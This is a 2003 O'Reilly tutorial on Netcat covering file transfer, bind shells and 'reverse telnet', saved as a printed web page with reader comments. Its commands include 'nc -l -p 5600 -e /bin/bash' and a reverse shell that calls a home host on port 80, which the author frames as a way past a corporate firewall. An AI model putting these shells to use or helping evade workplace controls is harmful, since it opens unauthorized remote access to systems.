O'Reilly Home Community Books Safari Books Online Conferences School of Technology About

Search Search Tips

Sign In/My Account | View Cart

We've expanded our LAMP news coverage and improved our search! Search for all things LAMP across O'Reilly!

ListenPrint

DiscussSubscribe to ONLamp

Subscribe to Newsletters

Netcat and Reverse Telnet

by KIVILCIM Hindistan05/29/2003

Today we live a virtually secure world of computing, with fancyfirewalls, user access lists, intrusion detection schemes, and so on. But occasionally you may justwant to copy a file from one computer to another, without breaching security, ringing bells all overthe network, or even meddling with cumbersome access lists. You may want to reach your workcomputer from home, so that you can finish your work, but the guardian firewall would not let youin.

Or you may just want to write your simplenetwork utility to fetch something fromsomewhere and do something to it, thefamous duct-tape method. You don't wantto use C++. You don't want to use Perl.You want nothing but the good old glueand fix method.

For all these seemingly difficult tasksthere is a wonderful tool called Netcat.

As you'd expect, the name Netcat comesfrom one of the basic Unix commandscat. cat "concatenates files and prints onstandard output", Netcat basically doesthe same. Instead of concatenating files,Netcat concatenates the TCP and UDPsockets, making it basically a "cat ofports". Just like its ancestors, the fundamental commands of the Unix environment, Netcat doesthis one thing and does it perfectly. You can glue it to other commands to make it do whatever youwant.

This article examines the basic usage of Netcat, including one or two tricks that will make your lifeeasier.

What can I use Netcat for?

As a basic point of view, Netcat is a telnet program. But that's like calling the Swiss Army Knifejust a knife. Netcat was written in 1996 by a hacker called Hobbit to meet all kinds of telnetneeds. Today you can easily find a version of Netcat for your flavor of Unix or even Windows.There are also some variants, such as cryptcat which adds vital encryption features, which wewill also use later in this article.

This article sticks to the vanilla Netcat. The examples are prepared with Unix in mind. You can trythem on other platforms, but your computer could blowup, your significant other might leave you,and, even worse, you will run out of coffee at once. Well, maybe just the latter.

Preparing Network Interfaces

To try Netcat, we must first make some preparations. Throughout this article we will discuss aconnection between two machines. For this article you don't need to have two machines, twocomputers, or even two network interfaces.

For TCP/IP communication, the Unix platform uses a virtual loopback (lo) interface with a defaultIP of 127.0.0.1. Under Linux, you can use 0 instead of this IP address. We will use this interface toset up two virtual interfaces.

Note that if we interfere with the 127.0.0.1 interface, we may break the network connection.

Recommended for You

Netcat and Reverse Telnet | O'Reilly Media http://www.onlamp.com/pub/a/onlamp/2003/05/29/netcat.html

1 di 4 21-04-2009 22:50

©2009, O'Reilly Media, Inc.(707) 827-7000 / (800)998-9938All trademarks and registeredtrademarks appearing onoreilly.com are the property oftheir respective owners.

About O'ReillyAcademic SolutionsAuthorsContactsCustomer ServiceJobsNewslettersO'Reilly LabsPress RoomPrivacy PolicyRSS FeedsTerms of ServiceUser GroupsWriting for O'Reilly

More O'Reilly SitesO'Reilly RadarIgniteTools of Change for PublishingDigital MediaInside iPhoneO'Reilly FYImakezine.comcraftzine.comhackszine.comperl.comxml.com

Partner SitesInsideRIAjava.net

Content ArchiveBusiness TechnologyComputer TechnologyGoogleMicrosoftMobileNetworkOperating SystemDigital PhotographyProgrammingSoftwareWebWeb Design

Instead, we will use lo:1 and lo:2 virtual interfaces. The following method will allow you toassign many IP numbers to the same network interface, such as eth0:0 or eth0:1. As root, enter:

% ifconfig lo:1 10.0.1.1% ifconfig lo:2 10.0.1.2

Now enter ifconfig to examine your interfaces:

lo Link encap:Local Loopbackinet addr:127.0.0.1 Mask:255.0.0.0UP LOOPBACK RUNNING MTU:16436 Metric:1RX packets:146 errors:0 dropped:0 overruns:0 frame:0TX packets:146 errors:0 dropped:0 overruns:0 carrier:0collisions:0 txqueuelen:0RX bytes:7708 (7.5 KiB) TX bytes:7708 (7.5 KiB)lo:1 Link encap:Local Loopbackinet addr:10.0.1.1 Mask:255.0.0.0UP LOOPBACK RUNNING MTU:16436 Metric:1lo:2 Link encap:Local Loopbackinet addr:10.0.1.2 Mask:255.0.0.0UP LOOPBACK RUNNING MTU:16436 Metric:1

Now that we have two network interfaces, we can continue with our examples as if we wereworking on two separate computers with different IP addresses.

Network Connection:

As I've stated before, Netcat is a telnet client. With the basic usage you can connect to any portwith nc host port. When you make a connection this way, everything you type goes to theremote machine (if it's listening to that port) and every response comes back to you. This goes onuntil the network connection is broken. As for the remote computer, I must remind you that Netcatis both a client and a server.

Now, let's open two consoles. One will be our server, listening to port 5600:

$ nc -l -p 5600

The other will be our client that connects to that port.

$ nc 10.0.1.1 5600

Now everything you do will be repeated at the first console. We have made our first connection.Experiment to your heart's content. Press Enter, Backspace, Ctrl-D, and Ctrl-C and see whathappens. Ctrl-C should have cut your connection.

At the first console give the command:

$ nc -l -p 5600 -vv

In the second:

$ nc 10.0.1.1 5600

Did you see anything different?

listening on [any] 5600 ...10.0.1.1: inverse host lookup failed: Unknown hostconnect to [10.0.1.1] from (UNKNOWN) [10.0.1.1] 33354

This time, Netcat was generous with its information. The extra -vv command option put Netcat inverbose mode. If you use one v then you end up with less information. This command is especiallyvaluable when troubleshooting. At the end, when you pressed Ctrl-c, Netcat exited, reporting howmany bytes were sent and received.

As in our first example we made connection between two virtual computers without protocol orrights management (as far as the firewalls let us).

File Transfer

One of the most practical usages of this network connection is the file transfer. As a basic Netcatfunction, this feature may be used to great effect in the hands of an experienced user. For afreshly installed computer, setting up a ftp server or, worse, meddling with rcp or scp protocolsmay be nauseating. Those commands may not be available for one, and multiple layers of controlmechanisms may interfere with their functionality. You can still transfer files with just one nccommand.

At the server console:

$ nc -v -w 30 -p 5600 l- > filename.back

and on the client side:

$ nc -v -w 2 10.0.1.1 5600 < filename

Magically, the file named filename is transfered from the client to the server. You can check thatthey are identical.

The command line uses the new argument -w to cause Netcat to wait for a few seconds. We madethat longer in the server side because it is most affected by a pause. Another important point isthe > and < redirection commands, with which Unix users are very familiar.

In the server we said > filename.back. Any output will be directed to this file. As it happens, theoutput is the file filename which is send by the client. Think of this as a pipeline. We take abucket (file), pour the contents to the pipeline (Netcat's port), and, at the other end we fillanother bucket from the pipeline.

Telnet

O'Reilly Training: iPhoneForensics: Recovering

Evidence, Personal Data,and Corporate Assets

Microsoft Project 2007: TheMissing Manual,

Format: Print, Ebook, $39.99

Learning the UnixOperating System, Fifth

Edition,Format: Print, $19.95

CGI Programming withPerl, Second Edition,Format: Print, $34.95

C in a Nutshell,Format: Print, $39.95

Sponsored Resources

Inside Lightroom

Related to this Article

Netcat and Reverse Telnet | O'Reilly Media http://www.onlamp.com/pub/a/onlamp/2003/05/29/netcat.html

2 di 4 21-04-2009 22:50

We can now transfer files, but maybe we want to make something more useful. For example, wemight want to login to a remote machine and do some work. We want to telnet without the hassleof working through access control mechanisms. The -e option comes in handy.

On the first console, enter:

$ nc -l -p 5600 -e /bin/bash

and at the second console:

$ nc 10.0.1.1. 5600

Now it is as if we are connected to the first machine and typing at the shell. We can see everyoutput of our command and do whatever we want with the server machine. We are connected to itas the root user. This is admittedly very scary and a bit unwise.

Security Notice and Cryptcat

Dumping output to a shell is the fastest method of remote control. It opens a port and waits forconnection. Whoever connects is welcome, with no security checks. Unlike the following ReverseTelnet this is an active connection; we can call it duck-tape telnet. If you must setup such a thingon an Internet-connected machine use Cryptcat. In fact you can use Cryptcat in every examplementioned here instead of Netcat, because they are almost the same (except that Cryptcat usesencryption and a keyphrase). But all the command notation is the same.

Small notice: I love Open Source! As the author of Cryptcat states:

Linux version -- why I like Linux... only had to change two lines of code to addencryption.

Thus if you want more security (which you should), use cryptcat with the -k option. Cryptcat'sencryption scheme has an embedded keyphrase of metallica. You can (and should) change thiswith the option -k, using your own keyword. After that, you not only have an easy telnet setup,but you also will be very secure.

Reverse Telnet

As we have such a generic tool, capable of many things, we can try something nastier (and thusmore useful). Consider a nice computer, with broadband network access, behind some firewall (asall useful computers are) in our office. The firewall will not allow any outside connections, onlythose queried from inside. This computer seems impossible to reach. To begin with, the computerwould not have a real IP that we could just type and reach; it is behind a router and firewall, usingtheir IPs instead.

Now what if we want to log into this computer and use it remotely, perhaps grabbing some files weforgot to bring home to work on tonight? We want all this with minimum security breach. Soundslike a challenge.

As we saw before, telnet worked with one machine waiting for a connection and the otherconnecting to it and giving commands. Telnet will not do the job here; not only are all ports of thecorporate firewall blocked, the machine we want to reach does not even have a legal IP. Ourtechnique should do just the reverse.

We have a server whose only allowed outside connection is port 80 for daily use, but it doesn'thave an outside IP address. The other computer at home probably has a real IP and whateverports you want are open at your request. Reversing the roles would solve our problems: make ourcomputer at work connect to the home computer, taking commands from the client andperforming them on the server. It's the reverse of usual telnet, so we call it Reverse Telnet.

First, let's name the machines. The one at work is called WORK and the one at home is called HOME.If we do not have a permanent IP at home (a dialup user usually) we should get a dynamic DNSname. Lots of organizations provide them, most at no charge such as dyndns.org. We do thisbecause in order to connect to home computer we must know its IP (or domain name)beforehand.

At the work computer, we'll set up a cron job to start at 22:01. Just as in the telnet example itconnects to myhome.dyndns.org (our dynamic DNS address) and starts bash.

And at home just at 22:00 or so we start:

$ nc -vv -l -p 80

to begin listening on port 80 for incoming connections.

At 22:01, WORK connects to HOME, starts bash and says 'Master!' Bingo. We are connected to WORK(or vice versa), and WORK is ready to operate any command we want.

We can try this at our virtual network (lo:1 and lo:2). To start the client listening for aconnection:

$ nc -vv -l -p 80

To make a connection from the server:

$ nc 10.0.1.1 80 -e /bin/bash

It is very simple and efficient, because we only use outgoing port 80, the most widely used portbecause it is used for web access. No one would block port 80 because everyone needs webaccess. They can force you to use a local proxy for that, but you can use another port like 21 or23 which are harder to put behind a proxy. If you have Internet access you should be able to findat least one open port.

Netcat has lots of other uses with which you can experiment through the loopback interface setup.As long as you know the TCP/IP machine and basics of the protocols, there is virtually no limit towhat you can do with Netcat. In the future, I will describe some other daily (arcane ;) uses ofNetcat, Cryptcat, and maybe their complicated and powerful cousin SoCat.

Sponsored by:

Getting Startedwith Pyparsingby Paul McGuireOctober 2007$9.99 USD

Rails onWindowsby Curt Hibbs ,Brian HoganMay 2007$9.99 USD

Netcat and Reverse Telnet | O'Reilly Media http://www.onlamp.com/pub/a/onlamp/2003/05/29/netcat.html

3 di 4 21-04-2009 22:50

Resources

NetcatCryptcat: Netcat with cryptographySoCat: Netcat on steroids

KIVILCIM Hindistan works as a full time computer security consultant with a CISSP, using Linuxand Free Software as weapons of choice.

Return to ONLamp.com.

Have you any clever uses of Netcat? Share them here.You must be logged in to the O'Reilly Network to post a talkback.

Showingmessages 1 through 4 of 4.

Netcat in windows2007-09-12 11:25:14 ITwanabe [Reply | View]

I am new to the security aspect of IT and so pardon my question.

I have tried to use nc in windows with some success but I still have question. If I amconnected to a remote system using nc., How can I issue a command to be excecuted onthe remote machine from the server.

I am assuming, I don't have physical access to the remote system.

Thanks for your time.

John.

error in syntax2005-04-05 10:39:47 solipsist [Reply | View]

this ...To make a connection from the server:$ nc 10.0.1.1 80 -e /bin/bash

should be ...$ nc -e /bin/bash 10.0.1.1 80

at least for my version netcat-1.10_2 on FreeBSD

Cryptcat doesn't work on AIX2003-09-10 07:10:27 anonymous2 [Reply | View]

Hi,

I have tried to get cryptcat working on AIX with no success.

Also the link from this website to cryptcat comes up with page not found on farn9 site.

Any comments / suggestions appreciated.

Thanks for the article2003-06-01 10:50:42 anonymous2 [Reply | View]

Useful article, looking forward to more of this.

Netcat and Reverse Telnet | O'Reilly Media http://www.onlamp.com/pub/a/onlamp/2003/05/29/netcat.html

4 di 4 21-04-2009 22:50